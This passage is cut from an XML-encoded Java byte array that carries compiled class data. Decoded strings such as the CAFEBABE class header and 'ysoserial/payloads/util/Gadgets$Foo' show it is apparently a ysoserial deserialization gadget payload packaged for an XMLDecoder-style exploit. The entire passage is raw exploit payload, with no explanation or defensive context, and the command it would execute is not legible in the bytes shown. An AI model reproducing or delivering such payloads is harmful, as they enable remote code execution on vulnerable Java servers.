index=\"3601\"><byte>0</byte></void><void index=\"3602\"><byte>1</byte></void><void index=\"3603\"><byte>0</byte></void><void index=\"3604\"><byte>0</byte></void><void index=\"3605\"><byte>0</byte></void><void index=\"3606\"><byte>1</byte></void><void index=\"3607\"><byte>0</byte></void><void index=\"3608\"><byte>23</byte></void><void index=\"3609\"><byte>0</byte></void><void index=\"3610\"><byte>24</byte></void><void index=\"3611\"><byte>0</byte></void><void index=\"3612\"><byte>2</byte></void><void index=\"3613\"><byte>0</byte></void><void index=\"3614\"><byte>25</byte></void><void index=\"3615\"><byte>0</byte></void><void index=\"3616\"><byte>0</byte></void><void index=\"3617\"><byte>0</byte></void><void index=\"3618\"><byte>4</byte></void><void index=\"3619\"><byte>0</byte></void><void index=\"3620\"><byte>1</byte></void><void index=\"3621\"><byte>0</byte></void><void index=\"3622\"><byte>26</byte></void><void index=\"3623\"><byte>0</byte></void><void index=\"3624\"><byte>1</byte></void><void index=\"3625\"><byte>0</byte></void><void index=\"3626\"><byte>19</byte></void><void index=\"3627\"><byte>0</byte></void><void index=\"3628\"><byte>27</byte></void><void index=\"3629\"><byte>0</byte></void><void index=\"3630\"><byte>2</byte></void><void index=\"3631\"><byte>0</byte></void><void index=\"3632\"><byte>12</byte></void><void index=\"3633\"><byte>0</byte></void><void index=\"3634\"><byte>0</byte></void><void index=\"3635\"><byte>0</byte></void><void index=\"3636\"><byte>73</byte></void><void index=\"3637\"><byte>0</byte></void><void index=\"3638\"><byte>0</byte></void><void index=\"3639\"><byte>0</byte></void><void index=\"3640\"><byte>4</byte></void><void index=\"3641\"><byte>0</byte></void><void index=\"3642\"><byte>0</byte></void><void index=\"3643\"><byte>0</byte></void><void index=\"3644\"><byte>1</byte></void><void index=\"3645\"><byte>-79</byte></void><void index=\"3646\"><byte>0</byte></void><void index=\"3647\"><byte>0</byte></void><void index=\"3648\"><byte>0</byte></void><void index=\"3649\"><byte>2</byte></void><void index=\"3650\"><byte>0</byte></void><void index=\"3651\"><byte>13</byte></void><void index=\"3652\"><byte>0</byte></void><void index=\"3653\"><byte>0</byte></void><void index=\"3654\"><byte>0</byte></void><void index=\"3655\"><byte>6</byte></void><void index=\"3656\"><byte>0</byte></void><void index=\"3657\"><byte>1</byte></void><void index=\"3658\"><byte>0</byte></void><void index=\"3659\"><byte>0</byte></void><void index=\"3660\"><byte>0</byte></void><void index=\"3661\"><byte>56</byte></void><void index=\"3662\"><byte>0</byte></void><void index=\"3663\"><byte>14</byte></void><void index=\"3664\"><byte>0</byte></void><void index=\"3665\"><byte>0</byte></void><void index=\"3666\"><byte>0</byte></void><void index=\"3667\"><byte>42</byte></void><void index=\"3668\"><byte>0</byte></void><void index=\"3669\"><byte>4</byte></void><void index=\"3670\"><byte>0</byte></void><void index=\"3671\"><byte>0</byte></void><void index=\"3672\"><byte>0</byte></void><void index=\"3673\"><byte>1</byte></void><void index=\"3674\"><byte>0</byte></void><void index=\"3675\"><byte>15</byte></void><void index=\"3676\"><byte>0</byte></void><void index=\"3677\"><byte>-71</byte></void><void index=\"3678\"><byte>0</byte></void><void index=\"3679\"><byte>0</byte></void><void index=\"3680\"><byte>0</byte></void><void index=\"3681\"><byte>0</byte></void><void index=\"3682\"><byte>0</byte></void><void index=\"3683\"><byte>1</byte></void><void index=\"3684\"><byte>0</byte></void><void index=\"3685\"><byte>21</byte></void><void index=\"3686\"><byte>0</byte></void><void index=\"3687\"><byte>22</byte></void><void index=\"3688\"><byte>0</byte></void><void index=\"3689\"><byte>1</byte></void><void index=\"3690\"><byte>0</byte></void><void index=\"3691\"><byte>0</byte></void><void index=\"3692\"><byte>0</byte></void><void index=\"3693\"><byte>1</byte></void><void index=\"3694\"><byte>0</byte></void><void index=\"3695\"><byte>28</byte></void><void index=\"3696\"><byte>0</byte></void><void index=\"3697\"><byte>29</byte></void><void index=\"3698\"><byte>0</byte></void><void index=\"3699\"><byte>2</byte></void><void index=\"3700\"><byte>0</byte></void><void index=\"3701\"><byte>0</byte></void><void index=\"3702\"><byte>0</byte></void><void index=\"3703\"><byte>1</byte></void><void index=\"3704\"><byte>0</byte></void><void index=\"3705\"><byte>30</byte></void><void index=\"3706\"><byte>0</byte></void><void index=\"3707\"><byte>31</byte></void><void index=\"3708\"><byte>0</byte></void><void index=\"3709\"><byte>3</byte></void><void index=\"3710\"><byte>0</byte></void><void index=\"3711\"><byte>25</byte></void><void index=\"3712\"><byte>0</byte></void><void index=\"3713\"><byte>0</byte></void><void index=\"3714\"><byte>0</byte></void><void index=\"3715\"><byte>4</byte></void><void index=\"3716\"><byte>0</byte></void><void index=\"3717\"><byte>1</byte></void><void index=\"3718\"><byte>0</byte></void><void index=\"3719\"><byte>26</byte></void><void index=\"3720\"><byte>0</byte></void><void index=\"3721\"><byte>8</byte></void><void index=\"3722\"><byte>0</byte></void><void index=\"3723\"><byte>41</byte></void><void index=\"3724\"><byte>0</byte></void><void index=\"3725\"><byte>11</byte></void><void index=\"3726\"><byte>0</byte></void><void index=\"3727\"><byte>1</byte></void><void index=\"3728\"><byte>0</byte></void><void index=\"3729\"><byte>12</byte></void><void index=\"3730\"><byte>0</byte></void><void index=\"3731\"><byte>0</byte></void><void index=\"3732\"><byte>1</byte></void><void index=\"3733\"><byte>114</byte></void><void index=\"3734\"><byte>0</byte></void><void index=\"3735\"><byte>7</byte></void><void index=\"3736\"><byte>0</byte></void><void index=\"3737\"><byte>11</byte></void><void index=\"3738\"><byte>0</byte></void><void index=\"3739\"><byte>0</byte></void><void index=\"3740\"><byte>1</byte></void><void index=\"3741\"><byte>18</byte></void><void index=\"3742\"><byte>-89</byte></void><void index=\"3743\"><byte>0</byte></void><void index=\"3744\"><byte>3</byte></void><void index=\"3745\"><byte>1</byte></void><void index=\"3746\"><byte>76</byte></void><void index=\"3747\"><byte>-72</byte></void><void index=\"3748\"><byte>0</byte></void><void index=\"3749\"><byte>47</byte></void><void index=\"3750\"><byte>-64</byte></void><void index=\"3751\"><byte>0</byte></void><void index=\"3752\"><byte>49</byte></void><void index=\"3753\"><byte>-74</byte></void><void index=\"3754\"><byte>0</byte></void><void index=\"3755\"><byte>53</byte></void><void index=\"3756\"><byte>-64</byte></void><void index=\"3757\"><byte>0</byte></void><void index=\"3758\"><byte>55</byte></void><void index=\"3759\"><byte>18</byte></void><void index=\"3760\"><byte>57</byte></void><void index=\"3761\"><byte>-74</byte></void><void index=\"3762\"><byte>0</byte></void><void index=\"3763\"><byte>61</byte></void><void index=\"3764\"><byte>77</byte></void><void index=\"3765\"><byte>-72</byte></void><void index=\"3766\"><byte>0</byte></void><void index=\"3767\"><byte>47</byte></void><void index=\"3768\"><byte>-64</byte></void><void index=\"3769\"><byte>0</byte></void><void index=\"3770\"><byte>49</byte></void><void index=\"3771\"><byte>-74</byte></void><void index=\"3772\"><byte>0</byte></void><void index=\"3773\"><byte>53</byte></void><void index=\"3774\"><byte>-64</byte></void><void index=\"3775\"><byte>0</byte></void><void index=\"3776\"><byte>55</byte></void><void index=\"3777\"><byte>-74</byte></void><void index=\"3778\"><byte>0</byte></void><void index=\"3779\"><byte>65</byte></void><void index=\"3780\"><byte>78</byte></void><void index=\"3781\"><byte>45</byte></void><void index=\"3782\"><byte>18</byte></void><void index=\"3783\"><byte>67</byte></void><void index=\"3784\"><byte>-74</byte></void><void index=\"3785\"><byte>0</byte></void><void index=\"3786\"><byte>73</byte></void><void index=\"3787\"><byte>45</byte></void><void index=\"3788\"><byte>-74</byte></void><void index=\"3789\"><byte>0</byte></void><void index=\"3790\"><byte>77</byte></void><void index=\"3791\"><byte>58</byte></void><void index=\"3792\"><byte>4</byte></void><void index=\"3793\"><byte>25</byte></void><void index=\"3794\"><byte>4</byte></void><void index=\"3795\"><byte>-69</byte></void><void index=\"3796\"><byte>0</byte></void><void index=\"3797\"><byte>79</byte></void><void index=\"3798\"><byte>89</byte></void><void index=\"3799\"><byte>-69</byte></void><void index=\"3800\"><byte>0</byte></void><void index=\"3801\"><byte>81</byte></void><void index=\"3802\"><byte>89</byte></void><void index=\"3803\"><byte>-73</byte></void><void index=\"3804\"><byte>0</byte></void><void index=\"3805\"><byte>82</byte></void><void index=\"3806\"><byte>44</byte></void><void index=\"3807\"><byte>-74</byte></void><void index=\"3808\"><byte>0</byte></void><void index=\"3809\"><byte>86</byte></void><void index=\"3810\"><byte>18</byte></void><void index=\"3811\"><byte>88</byte></void><void index=\"3812\"><byte>-74</byte></void><void index=\"3813\"><byte>0</byte></void><void index=\"3814\"><byte>86</byte></void><void index=\"3815\"><byte>-74</byte></void><void index=\"3816\"><byte>0</byte></void><void index=\"3817\"><byte>92</byte></void><void index=\"3818\"><byte>-73</byte></void><void index=\"3819\"><byte>0</byte></void><void index=\"3820\"><byte>94</byte></void><void index=\"3821\"><byte>-74</byte></void><void index=\"3822\"><byte>0</byte></void><void index=\"3823\"><byte>100</byte></void><void index=\"3824\"><byte>25</byte></void><void index=\"3825\"><byte>4</byte></void><void index=\"3826\"><byte>-74</byte></void><void index=\"3827\"><byte>0</byte></void><void index=\"3828\"><byte>103</byte></void><void index=\"3829\"><byte>18</byte></void><void index=\"3830\"><byte>105</byte></void><void index=\"3831\"><byte>-72</byte></void><void index=\"3832\"><byte>0</byte></void><void index=\"3833\"><byte>110</byte></void><void index=\"3834\"><byte>58</byte></void><void index=\"3835\"><byte>5</byte></void><void index=\"3836\"><byte>25</byte></void><void index=\"3837\"><byte>5</byte></void><void index=\"3838\"><byte>1</byte></void><void index=\"3839\"><byte>-91</byte></void><void index=\"3840\"><byte>0</byte></void><void index=\"3841\"><byte>16</byte></void><void index=\"3842\"><byte>25</byte></void><void index=\"3843\"><byte>5</byte></void><void index=\"3844\"><byte>-74</byte></void><void index=\"3845\"><byte>0</byte></void><void index=\"3846\"><byte>115</byte></void><void index=\"3847\"><byte>18</byte></void><void index=\"3848\"><byte>117</byte></void><void index=\"3849\"><byte>-74</byte></void><void index=\"3850\"><byte>0</byte></void><void index=\"3851\"><byte>121</byte></void><void index=\"3852\"><byte>-102</byte></void><void index=\"3853\"><byte>0</byte></void><void index=\"3854\"><byte>6</byte></void><void index=\"3855\"><byte>-89</byte></void><void index=\"3856\"><byte>0</byte></void><void index=\"3857\"><byte>33</byte></void><void index=\"3858\"><byte>-72</byte></void><void index=\"3859\"><byte>0</byte></void><void index=\"3860\"><byte>127</byte></void><void index=\"3861\"><byte>-69</byte></void><void index=\"3862\"><byte>0</byte></void><void index=\"3863\"><byte>81</byte></void><void index=\"3864\"><byte>89</byte></void><void index=\"3865\"><byte>-73</byte></void><void index=\"3866\"><byte>0</byte></void><void index=\"3867\"><byte>82</byte></void><void index=\"3868\"><byte>18</byte></void><void index=\"3869\"><byte>-127</byte></void><void index=\"3870\"><byte>-74</byte></void><void index=\"3871\"><byte>0</byte></void><void index=\"3872\"><byte>86</byte></void><void index=\"3873\"><byte>44</byte></void><void index=\"3874\"><byte>-74</byte></void><void index=\"3875\"><byte>0</byte></void><void index=\"3876\"><byte>86</byte></void><void index=\"3877\"><byte>-74</byte></void><void index=\"3878\"><byte>0</byte></void><void index=\"3879\"><byte>92</byte></void><void index=\"3880\"><byte>-74</byte></void><void index=\"3881\"><byte>0</byte></void><void index=\"3882\"><byte>-123</byte></void><void index=\"3883\"><byte>58</byte></void><void index=\"3884\"><byte>6</byte></void><void index=\"3885\"><byte>-89</byte></void><void index=\"3886\"><byte>0</byte></void><void index=\"3887\"><byte>30</byte></void><void index=\"3888\"><byte>-72</byte></void><void index=\"3889\"><byte>0</byte></void><void index=\"3890\"><byte>127</byte></void><void index=\"3891\"><byte>-69</byte></void><void index=\"3892\"><byte>0</byte></void><void index=\"3893\"><byte>81</byte></void><void index=\"3894\"><byte>89</byte></void><void index=\"3895\"><byte>-73</byte></void><void index=\"3896\"><byte>0</byte></void><void index=\"3897\"><byte>82</byte></void><void index=\"3898\"><byte>18</byte></void><void index=\"3899\"><byte>-121</byte></void><void index=\"3900\"><byte>-74</byte></void><void index=\"3901\"><byte>0</byte></void><void index=\"3902\"><byte>86</byte></void><void index=\"3903\"><byte>44</byte></void><void index=\"3904\"><byte>-74</byte></void><void index=\"3905\"><byte>0</byte></void><void index=\"3906\"><byte>86</byte></void><void index=\"3907\"><byte>-74</byte></void><void index=\"3908\"><byte>0</byte></void><void index=\"3909\"><byte>92</byte></void><void index=\"3910\"><byte>-74</byte></void><void index=\"3911\"><byte>0</byte></void><void index=\"3912\"><byte>-123</byte></void><void index=\"3913\"><byte>58</byte></void><void index=\"3914\"><byte>6</byte></void><void index=\"3915\"><byte>-69</byte></void><void index=\"3916\"><byte>0</byte></void><void index=\"3917\"><byte>-119</byte></void><void index=\"3918\"><byte>89</byte></void><void index=\"3919\"><byte>-69</byte></void><void index=\"3920\"><byte>0</byte></void><void index=\"3921\"><byte>-117</byte></void><void index=\"3922\"><byte>89</byte></void><void index=\"3923\"><byte>25</byte></void><void index=\"3924\"><byte>6</byte></void><void index=\"3925\"><byte>-74</byte></void><void index=\"3926\"><byte>0</byte></void><void index=\"3927\"><byte>-111</byte></void><void index=\"3928\"><byte>18</byte></void><void index=\"3929\"><byte>67</byte></void><void index=\"3930\"><byte>-73</byte></void><void index=\"3931\"><byte>0</byte></void><void index=\"3932\"><byte>-108</byte></void><void index=\"3933\"><byte>-73</byte></void><void index=\"3934\"><byte>0</byte></void><void index=\"3935\"><byte>-105</byte></void><void index=\"3936\"><byte>58</byte></void><void index=\"3937\"><byte>7</byte></void><void index=\"3938\"><byte>1</byte></void><void index=\"3939\"><byte>58</byte></void><void index=\"3940\"><byte>8</byte></void><void index=\"3941\"><byte>18</byte></void><void index=\"3942\"><byte>-103</byte></void><void index=\"3943\"><byte>58</byte></void><void index=\"3944\"><byte>9</byte></void><void index=\"3945\"><byte>-89</byte></void><void index=\"3946\"><byte>0</byte></void><void index=\"3947\"><byte>25</byte></void><void index=\"3948\"><byte>-69</byte></void><void index=\"3949\"><byte>0</byte></void><void index=\"3950\"><byte>81</byte></void><void index=\"3951\"><byte>89</byte></void><void index=\"3952\"><byte>-73</byte></void><void index=\"3953\"><byte>0</byte></void><void index=\"3954\"><byte>82</byte></void><void index=\"3955\"><byte>25</byte></void><void index=\"3956\"><byte>9</byte></void><void index=\"3957\"><byte>-74</byte></void><void index=\"3958\"><byte>0</byte></void><void index=\"3959\"><byte>86</byte></void><void index=\"3960\"><byte>25</byte></void><void index=\"3961\"><byte>8</byte></void><void index=\"3962\"><byte>-74</byte></void><void index=\"3963\"><byte>0</byte></void><void index=\"3964\"><byte>86</byte></void><void index=\"3965\"><byte>-74</byte></void><void index=\"3966\"><byte>0</byte></void><void index=\"3967\"><byte>92</byte></void><void index=\"3968\"><byte>58</byte></void><void index=\"3969\"><byte>9</byte></void><void index=\"3970\"><byte>25</byte></void><void index=\"3971\"><byte>7</byte></void><void index=\"3972\"><byte>-74</byte></void><void index=\"3973\"><byte>0</byte></void><void index=\"3974\"><byte>-100</byte></void><void index=\"3975\"><byte>89</byte></void><void index=\"3976\"><byte>58</byte></void><void index=\"3977\"><byte>8</byte></void><void index=\"3978\"><byte>1</byte></void><void index=\"3979\"><byte>-90</byte></void><void index=\"3980\"><byte>-1</byte></void><void index=\"3981\"><byte>-31</byte></void><void index=\"3982\"><byte>45</byte></void><void index=\"3983\"><byte>-74</byte></void><void index=\"3984\"><byte>0</byte></void><void index=\"3985\"><byte>-96</byte></void><void index=\"3986\"><byte>25</byte></void><void index=\"3987\"><byte>9</byte></void><void index=\"3988\"><byte>-74</byte></void><void index=\"3989\"><byte>0</byte></void><void index=\"3990\"><byte>-91</byte></void><void index=\"3991\"><byte>-89</byte></void><void index=\"3992\"><byte>0</byte></void><void index=\"3993\"><byte>24</byte></void><void index=\"3994\"><byte>58</byte></void><void index=\"3995\"><byte>10</byte></void><void index=\"3996\"><byte>-78</byte></void><void index=\"3997\"><byte>0</byte></void><void index=\"3998\"><byte>-85</byte></void><void index=\"3999\"><byte>25</byte></void><void index=\"4000\"><byte>10</byte></void><void index=\"4001\"><byte>-74</byte></void><void index=\"4002\"><byte>0</byte></void><void index=\"4003\"><byte>-82</byte></void><void index=\"4004\"><byte>-74</byte></void><void index=\"4005\"><byte>0</byte></void><void index=\"4006\"><byte>-77</byte></void><void index=\"4007\"><byte>25</byte></void><void index=\"4008\"><byte>10</byte></void><void index=\"4009\"><byte>-74</byte></void><void index=\"4010\"><byte>0</byte></void><void index=\"4011\"><byte>-74</byte></void><void index=\"4012\"><byte>-89</byte></void><void index=\"4013\"><byte>0</byte></void><void index=\"4014\"><byte>3</byte></void><void index=\"4015\"><byte>-79</byte></void><void index=\"4016\"><byte>0</byte></void><void index=\"4017\"><byte>1</byte></void><void index=\"4018\"><byte>0</byte></void><void index=\"4019\"><byte>94</byte></void><void index=\"4020\"><byte>0</byte></void><void index=\"4021\"><byte>-7</byte></void><void index=\"4022\"><byte>0</byte></void><void index=\"4023\"><byte>-4</byte></void><void index=\"4024\"><byte>0</byte></void><void index=\"4025\"><byte>-89</byte></void><void index=\"4026\"><byte>0</byte></void><void index=\"4027\"><byte>1</byte></void><void index=\"4028\"><byte>0</byte></void><void index=\"4029\"><byte>-73</byte></void><void index=\"4030\"><byte>0</byte></void><void index=\"4031\"><byte>0</byte></void><void index=\"4032\"><byte>0</byte></void><void index=\"4033\"><byte>70</byte></void><void index=\"4034\"><byte>0</byte></void><void index=\"4035\"><byte>9</byte></void><void index=\"4036\"><byte>3</byte></void><void index=\"4037\"><byte>-1</byte></void><void index=\"4038\"><byte>0</byte></void><void index=\"4039\"><byte>109</byte></void><void index=\"4040\"><byte>0</byte></void><void index=\"4041\"><byte>6</byte></void><void index=\"4042\"><byte>0</byte></void><void index=\"4043\"><byte>5</byte></void><void index=\"4044\"><byte>7</byte></void><void index=\"4045\"><byte>0</byte></void><void index=\"4046\"><byte>112</byte></void><void index=\"4047\"><byte>7</byte></void><void index=\"4048\"><byte>0</byte></void><void index=\"4049\"><byte>69</byte></void><void index=\"4050\"><byte>7</byte></void><void index=\"4051\"><byte>0</byte></void><void index=\"4052\"><byte>96</byte></void><void index=\"4053\"><byte>7</byte></void><void index=\"4054\"><byte>0</byte></void><void index=\"4055\"><byte>112</byte></void><void index=\"4056\"><byte>0</byte></void><void index=\"4057\"><byte>0</byte></void><void index=\"4058\"><byte>2</byte></void><void index=\"4059\"><byte>29</byte></void><void index=\"4060\"><byte>-4</byte></void><void index=\"4061\"><byte>0</byte></void><void index=\"4062\"><byte>26</byte></void><void index=\"4063\"><byte>7</byte></void><void index=\"4064\"><byte>0</byte></void><void index=\"4065\"><byte>-115</byte></void><void index=\"4066\"><byte>-2</byte></void><void index=\"4067\"><byte>0</byte></void><void index=\"4068\"><byte>32</byte></void><void index=\"4069\"><byte>7</byte></void><void index=\"4070\"><byte>0</byte></void><void index=\"4071\"><byte>-119</byte></void><void index=\"4072\"><byte>7</byte></void><void index=\"4073\"><byte>0</byte></void><void index=\"4074\"><byte>112</byte></void><void index=\"4075\"><byte>7</byte></void><void index=\"4076\"><byte>0</byte></void><void index=\"4077\"><byte>112</byte></void><void index=\"4078\"><byte>21</byte></void><void index=\"4079\"><byte>-1</byte></void><void index=\"4080\"><byte>0</byte></void><void index=\"4081\"><byte>23</byte></void><void index=\"4082\"><byte>0</byte></void><void index=\"4083\"><byte>6</byte></void><void index=\"4084\"><byte>0</byte></void><void index=\"4085\"><byte>5</byte></void><void index=\"4086\"><byte>7</byte></void><void index=\"4087\"><byte>0</byte></void><void index=\"4088\"><byte>112</byte></void><void index=\"4089\"><byte>7</byte></void><void index=\"4090\"><byte>0</byte></void><void index=\"4091\"><byte>69</byte></void><void index=\"4092\"><byte>7</byte></void><void index=\"4093\"><byte>0</byte></void><void index=\"4094\"><byte>96</byte></void><void index=\"4095\"><byte>7</byte></void><void index=\"4096\"><byte>0</byte></void><void index=\"4097\"><byte>112</byte></void><void index=\"4098\"><byte>0</byte></void><void index=\"4099\"><byte>1</byte></void><void index=\"4100\"><byte>7</byte></void><void index=\"4101\"><byte>0</byte></void><void index=\"4102\"><byte>-89</byte></void><void index=\"4103\"><byte>20</byte></void><void index=\"4104\"><byte>0</byte></void><void index=\"4105\"><byte>2</byte></void><void index=\"4106\"><byte>0</byte></void><void index=\"4107\"><byte>32</byte></void><void index=\"4108\"><byte>0</byte></void><void index=\"4109\"><byte>0</byte></void><void index=\"4110\"><byte>0</byte></void><void index=\"4111\"><byte>2</byte></void><void index=\"4112\"><byte>0</byte></void><void index=\"4113\"><byte>33</byte></void><void index=\"4114\"><byte>0</byte></void><void index=\"4115\"><byte>17</byte></void><void index=\"4116\"><byte>0</byte></void><void index=\"4117\"><byte>0</byte></void><void index=\"4118\"><byte>0</byte></void><void index=\"4119\"><byte>10</byte></void><void index=\"4120\"><byte>0</byte></void><void index=\"4121\"><byte>1</byte></void><void index=\"4122\"><byte>0</byte></void><void index=\"4123\"><byte>2</byte></void><void index=\"4124\"><byte>0</byte></void><void index=\"4125\"><byte>35</byte></void><void index=\"4126\"><byte>0</byte></void><void index=\"4127\"><byte>16</byte></void><void index=\"4128\"><byte>0</byte></void><void index=\"4129\"><byte>9</byte></void><void index=\"4130\"><byte>117</byte></void><void index=\"4131\"><byte>113</byte></void><void index=\"4132\"><byte>0</byte></void><void index=\"4133\"><byte>126</byte></void><void index=\"4134\"><byte>0</byte></void><void index=\"4135\"><byte>13</byte></void><void index=\"4136\"><byte>0</byte></void><void index=\"4137\"><byte>0</byte></void><void index=\"4138\"><byte>1</byte></void><void index=\"4139\"><byte>-44</byte></void><void index=\"4140\"><byte>-54</byte></void><void index=\"4141\"><byte>-2</byte></void><void index=\"4142\"><byte>-70</byte></void><void index=\"4143\"><byte>-66</byte></void><void index=\"4144\"><byte>0</byte></void><void index=\"4145\"><byte>0</byte></void><void index=\"4146\"><byte>0</byte></void><void index=\"4147\"><byte>50</byte></void><void index=\"4148\"><byte>0</byte></void><void index=\"4149\"><byte>27</byte></void><void index=\"4150\"><byte>10</byte></void><void index=\"4151\"><byte>0</byte></void><void index=\"4152\"><byte>3</byte></void><void index=\"4153\"><byte>0</byte></void><void index=\"4154\"><byte>21</byte></void><void index=\"4155\"><byte>7</byte></void><void index=\"4156\"><byte>0</byte></void><void index=\"4157\"><byte>23</byte></void><void index=\"4158\"><byte>7</byte></void><void index=\"4159\"><byte>0</byte></void><void index=\"4160\"><byte>24</byte></void><void index=\"4161\"><byte>7</byte></void><void index=\"4162\"><byte>0</byte></void><void index=\"4163\"><byte>25</byte></void><void index=\"4164\"><byte>1</byte></void><void index=\"4165\"><byte>0</byte></void><void index=\"4166\"><byte>16</byte></void><void index=\"4167\"><byte>115</byte></void><void index=\"4168\"><byte>101</byte></void><void index=\"4169\"><byte>114</byte></void><void index=\"4170\"><byte>105</byte></void><void index=\"4171\"><byte>97</byte></void><void index=\"4172\"><byte>108</byte></void><void index=\"4173\"><byte>86</byte></void><void index=\"4174\"><byte>101</byte></void><void index=\"4175\"><byte>114</byte></void><void index=\"4176\"><byte>115</byte></void><void index=\"4177\"><byte>105</byte></void><void index=\"4178\"><byte>111</byte></void><void index=\"4179\"><byte>110</byte></void><void index=\"4180\"><byte>85</byte></void><void index=\"4181\"><byte>73</byte></void><void index=\"4182\"><byte>68</byte></void><void index=\"4183\"><byte>1</byte></void><void index=\"4184\"><byte>0</byte></void><void index=\"4185\"><byte>1</byte></void><void index=\"4186\"><byte>74</byte></void><void index=\"4187\"><byte>1</byte></void><void index=\"4188\"><byte>0</byte></void><void index=\"4189\"><byte>13</byte></void><void index=\"4190\"><byte>67</byte></void><void index=\"4191\"><byte>111</byte></void><void index=\"4192\"><byte>110</byte></void><void index=\"4193\"><byte>115</byte></void><void index=\"4194\"><byte>116</byte></void><void index=\"4195\"><byte>97</byte></void><void index=\"4196\"><byte>110</byte></void><void index=\"4197\"><byte>116</byte></void><void index=\"4198\"><byte>86</byte></void><void index=\"4199\"><byte>97</byte></void><void index=\"4200\"><byte>108</byte></void><void index=\"4201\"><byte>117</byte></void><void index=\"4202\"><byte>101</byte></void><void index=\"4203\"><byte>5</byte></void><void index=\"4204\"><byte>113</byte></void><void index=\"4205\"><byte>-26</byte></void><void index=\"4206\"><byte>105</byte></void><void index=\"4207\"><byte>-18</byte></void><void index=\"4208\"><byte>60</byte></void><void index=\"4209\"><byte>109</byte></void><void index=\"4210\"><byte>71</byte></void><void index=\"4211\"><byte>24</byte></void><void index=\"4212\"><byte>1</byte></void><void index=\"4213\"><byte>0</byte></void><void index=\"4214\"><byte>6</byte></void><void index=\"4215\"><byte>60</byte></void><void index=\"4216\"><byte>105</byte></void><void index=\"4217\"><byte>110</byte></void><void index=\"4218\"><byte>105</byte></void><void index=\"4219\"><byte>116</byte></void><void index=\"4220\"><byte>62</byte></void><void index=\"4221\"><byte>1</byte></void><void index=\"4222\"><byte>0</byte></void><void index=\"4223\"><byte>3</byte></void><void index=\"4224\"><byte>40</byte></void><void index=\"4225\"><byte>41</byte></void><void index=\"4226\"><byte>86</byte></void><void index=\"4227\"><byte>1</byte></void><void index=\"4228\"><byte>0</byte></void><void index=\"4229\"><byte>4</byte></void><void index=\"4230\"><byte>67</byte></void><void index=\"4231\"><byte>111</byte></void><void index=\"4232\"><byte>100</byte></void><void index=\"4233\"><byte>101</byte></void><void index=\"4234\"><byte>1</byte></void><void index=\"4235\"><byte>0</byte></void><void index=\"4236\"><byte>15</byte></void><void index=\"4237\"><byte>76</byte></void><void index=\"4238\"><byte>105</byte></void><void index=\"4239\"><byte>110</byte></void><void index=\"4240\"><byte>101</byte></void><void index=\"4241\"><byte>78</byte></void><void index=\"4242\"><byte>117</byte></void><void index=\"4243\"><byte>109</byte></void><void index=\"4244\"><byte>98</byte></void><void index=\"4245\"><byte>101</byte></void><void index=\"4246\"><byte>114</byte></void><void index=\"4247\"><byte>84</byte></void><void index=\"4248\"><byte>97</byte></void><void index=\"4249\"><byte>98</byte></void><void index=\"4250\"><byte>108</byte></void><void index=\"4251\"><byte>101</byte></void><void index=\"4252\"><byte>1</byte></void><void index=\"4253\"><byte>0</byte></void><void index=\"4254\"><byte>18</byte></void><void index=\"4255\"><byte>76</byte></void><void index=\"4256\"><byte>111</byte></void><void index=\"4257\"><byte>99</byte></void><void index=\"4258\"><byte>97</byte></void><void index=\"4259\"><byte>108</byte></void><void index=\"4260\"><byte>86</byte></void><void index=\"4261\"><byte>97</byte></void><void index=\"4262\"><byte>114</byte></void><void index=\"4263\"><byte>105</byte></void><void index=\"4264\"><byte>97</byte></void><void index=\"4265\"><byte>98</byte></void><void index=\"4266\"><byte>108</byte></void><void index=\"4267\"><byte>101</byte></void><void index=\"4268\"><byte>84</byte></void><void index=\"4269\"><byte>97</byte></void><void index=\"4270\"><byte>98</byte></void><void index=\"4271\"><byte>108</byte></void><void index=\"4272\"><byte>101</byte></void><void index=\"4273\"><byte>1</byte></void><void index=\"4274\"><byte>0</byte></void><void index=\"4275\"><byte>4</byte></void><void index=\"4276\"><byte>116</byte></void><void index=\"4277\"><byte>104</byte></void><void index=\"4278\"><byte>105</byte></void><void index=\"4279\"><byte>115</byte></void><void index=\"4280\"><byte>1</byte></void><void index=\"4281\"><byte>0</byte></void><void index=\"4282\"><byte>3</byte></void><void index=\"4283\"><byte>70</byte></void><void index=\"4284\"><byte>111</byte></void><void index=\"4285\"><byte>111</byte></void><void index=\"4286\"><byte>1</byte></void><void index=\"4287\"><byte>0</byte></void><void index=\"4288\"><byte>12</byte></void><void index=\"4289\"><byte>73</byte></void><void index=\"4290\"><byte>110</byte></void><void index=\"4291\"><byte>110</byte></void><void index=\"4292\"><byte>101</byte></void><void index=\"4293\"><byte>114</byte></void><void index=\"4294\"><byte>67</byte></void><void index=\"4295\"><byte>108</byte></void><void index=\"4296\"><byte>97</byte></void><void index=\"4297\"><byte>115</byte></void><void index=\"4298\"><byte>115</byte></void><void index=\"4299\"><byte>101</byte></void><void index=\"4300\"><byte>115</byte></void><void index=\"4301\"><byte>1</byte></void><void index=\"4302\"><byte>0</byte></void><void index=\"4303\"><byte>37</byte></void><void index=\"4304\"><byte>76</byte></void><void index=\"4305\"><byte>121</byte></void><void index=\"4306\"><byte>115</byte></void><void index=\"4307\"><byte>111</byte></void><void index=\"4308\"><byte>115</byte></void><void index=\"4309\"><byte>101</byte></void><void index=\"4310\"><byte>114</byte></void><void index=\"4311\"><byte>105</byte></void><void index=\"4312\"><byte>97</byte></void><void index=\"4313\"><byte>108</byte></void><void index=\"4314\"><byte>47</byte></void><void index=\"4315\"><byte>112</byte></void><void index=\"4316\"><byte>97</byte></void><void index=\"4317\"><byte>121</byte></void><void index=\"4318\"><byte>108</byte></void><void index=\"4319\"><byte>111</byte></void><void index=\"4320\"><byte>97</byte></void><void index=\"4321\"><byte>100</byte></void><void index=\"4322\"><byte>115</byte></void><void index=\"4323\"><byte>47</byte></void><void index=\"4324\"><byte>117</byte></void><void index=\"4325\"><byte>116</byte></void><void index=\"4326\"><byte>105</byte></void><void index=\"4327\"><byte>108</byte></void><void index=\"4328\"><byte>47</byte></void><void index=\"4329\"><byte>71</byte></void><void index=\"4330\"><byte>97</byte></void><void index=\"4331\"><byte>100</byte></void><void index=\"4332\"><byte>103</byte></void><void index=\"4333\"><byte>101</byte></void><void index=\"4334\"><byte>116</byte></void><void index=\"4335\"><byte>115</byte></void><void index=\"4336\"><byte>36</byte></void><void index=\"4337\"><byte>70</byte></void><void index=\"4338\"><byte>111</byte></void><void index=\"4339\"><byte>111</byte></void><void index=\"4340\"><byte>59</byte></void><void index=\"4341\"><byte>1</byte></void><void index=\"4342\"><byte>0</byte></void><void index=\"4343\"><byte>10</byte></void><void index=\"4344\"><byte>83</byte></void><void 